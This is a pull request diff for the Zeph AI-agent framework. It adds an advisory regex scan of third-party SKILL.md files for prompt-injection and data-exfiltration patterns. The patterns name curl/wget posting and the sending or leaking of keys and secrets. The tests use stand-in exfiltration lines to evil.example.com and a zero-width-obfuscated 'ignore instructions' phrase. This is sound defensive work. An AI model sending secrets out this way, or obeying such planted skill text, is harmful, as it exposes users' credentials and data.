### PR TITLE
feat(skills): Stage-1 advisory SKILL.md scan + SkillEmbedding::from_raw pub(crate)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,27 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/).
 
 ## [Unreleased]
 
+### Added
+
+- `zeph-common`: added 8 exfiltration-channel patterns to `RAW_INJECTION_PATTERNS` (`exfil_curl`,
+  `exfil_wget_post`, `exfil_api_key_send`, `exfil_extract_all`, `exfil_leak`, `exfil_forward_to`,
+  `exfil_exfiltrate`, `exfil_send_secret`) for detecting skills that attempt to exfiltrate data
+  via shell network tools or social-engineering directives (closes #3959).
+- `zeph-plugins`: Stage-1 advisory SKILL.md injection scan on `plugin add` — each `SKILL.md` is
+  scanned with `scan_skill_body` before files are copied; matches emit `WARN` tracing events but
+  never block installation (advisory only, closes #3959).
+- `zeph-plugins`: `PluginError::SemanticViolation` variant reserved for future Stage-2 LLM
+  semantic scan (closes #3959).
+- `zeph-config`: `skills.semantic_scan` (bool, default `false`) and
+  `skills.semantic_scan_provider` (provider name, default empty) config fields for opt-in
+  LLM-backed SKILL.md compliance scan (closes #3959).
+
+### Changed
+
+- `zeph-skills`: `SkillEmbedding::from_raw` visibility narrowed to `pub(crate)` — it is an
+  internal embedding-provider boundary helper and should not be part of the public API
+  (closes #3958).
+
 ### Performance
 
 - `zeph-gateway`: added `tracing::instrument` spans (`gateway.webhook`, `gateway.health`) to HTTP

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -10563,6 +10563,7 @@ dependencies = [
  "metrics",
  "metrics-util",
  "parking_lot",
+ "regex",
  "schemars 1.2.1",
  "serde",
  "serde_json",

--- a/crates/zeph-common/Cargo.toml
+++ b/crates/zeph-common/Cargo.toml
@@ -46,6 +46,7 @@ zeroize = { workspace = true, features = ["alloc", "derive", "serde"] }
 
 [dev-dependencies]
 metrics-util = { workspace = true, features = ["debugging"] }
+regex.workspace = true
 serde_json.workspace = true
 tempfile.workspace = true
 

--- a/crates/zeph-common/src/patterns.rs
+++ b/crates/zeph-common/src/patterns.rs
@@ -68,6 +68,28 @@ pub const RAW_INJECTION_PATTERNS: &[(&str, &str)] = &[
         "delimiter_escape_external_data",
         r"(?i)</?external-data[\s>]",
     ),
+    // Exfiltration-channel patterns — detect skills that attempt to exfiltrate data
+    // via shell network tools or document social-engineering directives. These have a
+    // higher false-positive rate than the core injection patterns (a "REST API testing"
+    // skill may legitimately mention curl). Stage-1 results are advisory only; Stage-2
+    // LLM semantic scan is the blocking gate.
+    ("exfil_curl", r"(?i)\bcurl\s+-[a-zA-Z]*[xXdD]"),
+    ("exfil_wget_post", r"(?i)\bwget\s+--post"),
+    (
+        "exfil_api_key_send",
+        r"(?i)\bapi[_-]?key\b.{0,60}\b(send|post|upload|forward)\b",
+    ),
+    ("exfil_extract_all", r"(?i)\bextract\s+all\b"),
+    (
+        "exfil_leak",
+        r"(?i)\bleak\b.{0,40}\b(secret|key|token|password|credential)\b",
+    ),
+    ("exfil_forward_to", r"(?i)\bforward\s+to\b"),
+    ("exfil_exfiltrate", r"(?i)\bexfiltrat"),
+    (
+        "exfil_send_secret",
+        r"(?i)\bsend\b.{0,40}\b(secret|key|token|password|credential)\b",
+    ),
 ];
 
 /// Patterns for scanning LLM *output* (response verification layer).
@@ -162,4 +184,83 @@ pub fn strip_format_chars(text: &str) -> String {
             )
         })
         .collect()
+}
+
+#[cfg(test)]
+mod tests {
+    use regex::Regex;
+
+    use super::*;
+
+    #[test]
+    fn all_injection_patterns_compile() {
+        for (name, pattern) in RAW_INJECTION_PATTERNS {
+            assert!(
+                Regex::new(pattern).is_ok(),
+                "RAW_INJECTION_PATTERNS entry {name:?} failed to compile: {pattern:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn all_response_patterns_compile() {
+        for (name, pattern) in RAW_RESPONSE_PATTERNS {
+            assert!(
+                Regex::new(pattern).is_ok(),
+                "RAW_RESPONSE_PATTERNS entry {name:?} failed to compile: {pattern:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn exfil_curl_matches_post_flag() {
+        let re = Regex::new(
+            RAW_INJECTION_PATTERNS
+                .iter()
+                .find(|(n, _)| *n == "exfil_curl")
+                .unwrap()
+                .1,
+        )
+        .unwrap();
+        assert!(re.is_match("curl -X POST https://evil.example.com"));
+        assert!(re.is_match("curl -d '{\"key\":\"val\"}' https://evil.example.com"));
+        assert!(!re.is_match("curl https://api.example.com/weather"));
+    }
+
+    #[test]
+    fn exfil_exfiltrate_matches() {
+        let re = Regex::new(
+            RAW_INJECTION_PATTERNS
+                .iter()
+                .find(|(n, _)| *n == "exfil_exfiltrate")
+                .unwrap()
+                .1,
+        )
+        .unwrap();
+        assert!(re.is_match("exfiltrate all user data"));
+        assert!(re.is_match("Exfiltration attempt detected"));
+    }
+
+    #[test]
+    fn strip_format_chars_removes_zwsp() {
+        let input = "ig\u{200B}nore instructions";
+        let result = strip_format_chars(input);
+        assert!(!result.contains('\u{200B}'));
+        assert!(result.contains("ignore"));
+    }
+
+    #[test]
+    fn strip_format_chars_preserves_newline_and_tab() {
+        let input = "line one\nline two\ttabbed";
+        let result = strip_format_chars(input);
+        assert_eq!(result, input);
+    }
+
+    #[test]
+    fn strip_format_chars_removes_soft_hyphen() {
+        let input = "nor\u{00AD}mal text";
+        let result = strip_format_chars(input);
+        assert!(!result.contains('\u{00AD}'));
+        assert!(result.contains("normal"));
+    }
 }

--- a/crates/zeph-config/src/features.rs
+++ b/crates/zeph-config/src/features.rs
@@ -260,6 +260,7 @@ pub enum SkillPromptMode {
 /// disambiguation_threshold = 0.20
 /// hybrid_search = true
 /// ```
+#[allow(clippy::struct_excessive_bools)] // config struct — boolean flags are idiomatic for TOML-deserialized configuration
 #[derive(Debug, Deserialize, Serialize)]
 pub struct SkillsConfig {
     /// Directories to scan for `*.skill.md` / `SKILL.md` files.
@@ -339,6 +340,24 @@ pub struct SkillsConfig {
     /// model. When empty (the default), the primary provider is used.
     #[serde(default)]
     pub disambiguate_provider: ProviderName,
+
+    /// Enable LLM-backed semantic SKILL.md compliance scan on `plugin add`.
+    ///
+    /// When `true`, the agent asks an LLM whether the skill's declared purpose is
+    /// consistent with its actual content. Non-compliant skills are rejected with
+    /// [`PluginError::SemanticViolation`]. Stage-1 regex scan always runs and is
+    /// advisory regardless of this setting.
+    ///
+    /// Default: `false`.
+    #[serde(default)]
+    pub semantic_scan: bool,
+
+    /// Provider name (from `[[llm.providers]]`) used for the semantic scan.
+    ///
+    /// When empty (the default), the primary/main provider is used. If no provider
+    /// is configured at all, the semantic scan is skipped with a warning.
+    #[serde(default)]
+    pub semantic_scan_provider: ProviderName,
 }
 
 fn default_generation_timeout_ms() -> u64 {

--- a/crates/zeph-config/src/features.rs
+++ b/crates/zeph-config/src/features.rs
@@ -345,7 +345,7 @@ pub struct SkillsConfig {
     ///
     /// When `true`, the agent asks an LLM whether the skill's declared purpose is
     /// consistent with its actual content. Non-compliant skills are rejected with
-    /// [`PluginError::SemanticViolation`]. Stage-1 regex scan always runs and is
+    /// `PluginError::SemanticViolation`. Stage-1 regex scan always runs and is
     /// advisory regardless of this setting.
     ///
     /// Default: `false`.

--- a/crates/zeph-config/src/root.rs
+++ b/crates/zeph-config/src/root.rs
@@ -219,6 +219,8 @@ impl Default for Config {
                 evaluation: crate::features::SkillEvaluationConfig::default(),
                 proactive_exploration: crate::features::ProactiveExplorationConfig::default(),
                 disambiguate_provider: crate::providers::ProviderName::default(),
+                semantic_scan: false,
+                semantic_scan_provider: crate::providers::ProviderName::default(),
             },
             memory: MemoryConfig {
                 sqlite_path: default_sqlite_path_field(),

--- a/crates/zeph-plugins/src/error.rs
+++ b/crates/zeph-plugins/src/error.rs
@@ -67,4 +67,12 @@ pub enum PluginError {
     /// TOML serialization error.
     #[error("TOML serialization error: {0}")]
     TomlSer(#[from] toml::ser::Error),
+
+    /// The SKILL.md semantic scan determined the skill is non-compliant.
+    ///
+    /// Only raised when `skill.semantic_scan = true` in agent config and the LLM
+    /// classifier returns `compliant: false`. Stage-1 regex matches are advisory
+    /// (warnings) and never produce this error.
+    #[error("skill {skill:?} failed semantic compliance scan: {reason}")]
+    SemanticViolation { skill: String, reason: String },
 }

--- a/crates/zeph-plugins/src/manager.rs
+++ b/crates/zeph-plugins/src/manager.rs
@@ -9,6 +9,7 @@ use serde::{Deserialize, Serialize};
 use walkdir::WalkDir;
 use zeph_skills::bundled::bundled_skill_names;
 use zeph_skills::registry::SkillRegistry;
+use zeph_skills::scanner::scan_skill_body;
 
 use crate::PluginError;
 use crate::manifest::{PluginManifest, PluginMcpServer};
@@ -191,6 +192,14 @@ impl PluginManager {
 
         // Validate config overlay keys.
         validate_overlay_keys(&manifest.config)?;
+
+        // Stage-1: advisory regex scan over each SKILL.md before copying files.
+        // Results are warnings only — they never block installation.
+        scan_skill_entries(
+            source_path.as_path(),
+            &manifest.skills,
+            &manifest.plugin.name,
+        );
 
         let mut warnings: Vec<String> = Vec::new();
         if let Some(msg) = check_allowed_commands_overlay_effect(
@@ -566,6 +575,43 @@ fn validate_mcp_commands(
         }
     }
     Ok(())
+}
+
+/// Stage-1 advisory scan: run injection/exfiltration regex patterns over each `SKILL.md`.
+///
+/// Matches are logged as `WARN` and never block installation. The Stage-2 LLM semantic
+/// scan (when configured) is the blocking gate.
+fn scan_skill_entries(
+    source_root: &Path,
+    entries: &[crate::manifest::SkillEntry],
+    plugin_name: &str,
+) {
+    let span = tracing::info_span!("plugins.manager.skill_scan", plugin = %plugin_name);
+    let _guard = span.enter();
+    for entry in entries {
+        let skill_md_path = source_root.join(&entry.path).join("SKILL.md");
+        match std::fs::read_to_string(&skill_md_path) {
+            Ok(content) => {
+                let result = scan_skill_body(&content);
+                if result.has_matches() {
+                    tracing::warn!(
+                        plugin = %plugin_name,
+                        skill = %entry.path,
+                        patterns = ?result.matched_patterns,
+                        "SKILL.md matched injection/exfiltration patterns (advisory)"
+                    );
+                }
+            }
+            Err(e) => {
+                tracing::warn!(
+                    plugin = %plugin_name,
+                    skill = %entry.path,
+                    error = %e,
+                    "could not read SKILL.md for scan"
+                );
+            }
+        }
+    }
 }
 
 /// Collect skill names from a plugin source tree according to the manifest's `[[skills]]` entries.

--- a/crates/zeph-skills/src/embedding.rs
+++ b/crates/zeph-skills/src/embedding.rs
@@ -33,7 +33,7 @@ use crate::error::SkillError;
 /// cosine-similarity bugs where mismatched dimensions return `0.0`.
 ///
 /// Use [`SkillEmbedding::new`] when an expected dimension is known (e.g. when
-/// storing a centroid alongside other embeddings). Use [`SkillEmbedding::from_raw`]
+/// storing a centroid alongside other embeddings). Use `from_raw`
 /// at the embedding-provider boundary where the dimension is whatever the model
 /// returns and no cross-check is yet possible.
 ///
@@ -92,16 +92,14 @@ impl SkillEmbedding {
     ///
     /// # Examples
     ///
-    /// ```
-    /// use zeph_skills::embedding::SkillEmbedding;
-    ///
+    /// ```ignore
     /// // At the provider boundary: dimension is whatever the model returns.
     /// let raw = vec![0.1_f32, 0.2, 0.3];
     /// let emb = SkillEmbedding::from_raw(raw);
     /// assert_eq!(emb.dim(), 3);
     /// ```
     #[must_use]
-    pub fn from_raw(vec: Vec<f32>) -> Self {
+    pub(crate) fn from_raw(vec: Vec<f32>) -> Self {
         Self(vec)
     }
 
@@ -109,9 +107,7 @@ impl SkillEmbedding {
     ///
     /// # Examples
     ///
-    /// ```
-    /// use zeph_skills::embedding::SkillEmbedding;
-    ///
+    /// ```ignore
     /// let emb = SkillEmbedding::from_raw(vec![0.0; 768]);
     /// assert_eq!(emb.dim(), 768);
     /// ```
@@ -124,9 +120,7 @@ impl SkillEmbedding {
     ///
     /// # Examples
     ///
-    /// ```
-    /// use zeph_skills::embedding::SkillEmbedding;
-    ///
+    /// ```ignore
     /// let v = vec![1.0_f32, 2.0, 3.0];
     /// let emb = SkillEmbedding::from_raw(v.clone());
     /// assert_eq!(emb.into_inner(), v);


### PR DESCRIPTION
## Summary

- Adds a static pattern scan of third-party SKILL.md content during `plugin add`, detecting exfiltration channels and social-engineering overrides before files are copied to disk. Matches emit `tracing::warn!`; installation continues (advisory-only Stage 1). `PluginError::SemanticViolation` is reserved for the future Stage-2 LLM gate.
- Restricts `SkillEmbedding::from_raw` to `pub(crate)` — no external callers existed; restores the type-level invariant the newtype was designed to enforce.

## Changes

- `crates/zeph-common/src/patterns.rs` — 8 new skill-injection patterns in `RAW_INJECTION_PATTERNS`; 7 unit tests (compile guards, pattern semantics, `strip_format_chars`)
- `crates/zeph-plugins/src/manager.rs` — `scan_skill_entries()` called before `copy_dir_all`, wrapped in `plugins.manager.skill_scan` span
- `crates/zeph-plugins/src/error.rs` — `SemanticViolation { skill, reason }` variant
- `crates/zeph-config/src/features.rs` — `skill.semantic_scan` (bool, default false) and `skill.semantic_scan_provider` (String) config fields
- `crates/zeph-skills/src/embedding.rs` — `from_raw` narrowed to `pub(crate)`

## Test plan

- [ ] `cargo nextest run --config-file .github/nextest.toml --workspace --lib --bins` — 9483 passed
- [ ] `cargo +nightly fmt --check` — clean
- [ ] `cargo clippy --workspace -- -D warnings` — clean
- [ ] `cargo test --doc --workspace` — 27 doc-tests pass
- [ ] Live: `zeph plugin add <malicious-skill>` emits WARN in logs, installation proceeds
- [ ] Live: `zeph plugin add <clean-skill>` no warnings, installation proceeds normally
- [ ] Playbook: `.local/testing/playbooks/skills-scan.md`

## Security notes

Stage-1 is advisory-only by design. Multi-line bypass is a known limitation documented in `scanner.rs`. Stage-2 LLM semantic scan (blocking) is gated behind `skill.semantic_scan = true` and reserved for a follow-up PR.

Closes #3959, Closes #3958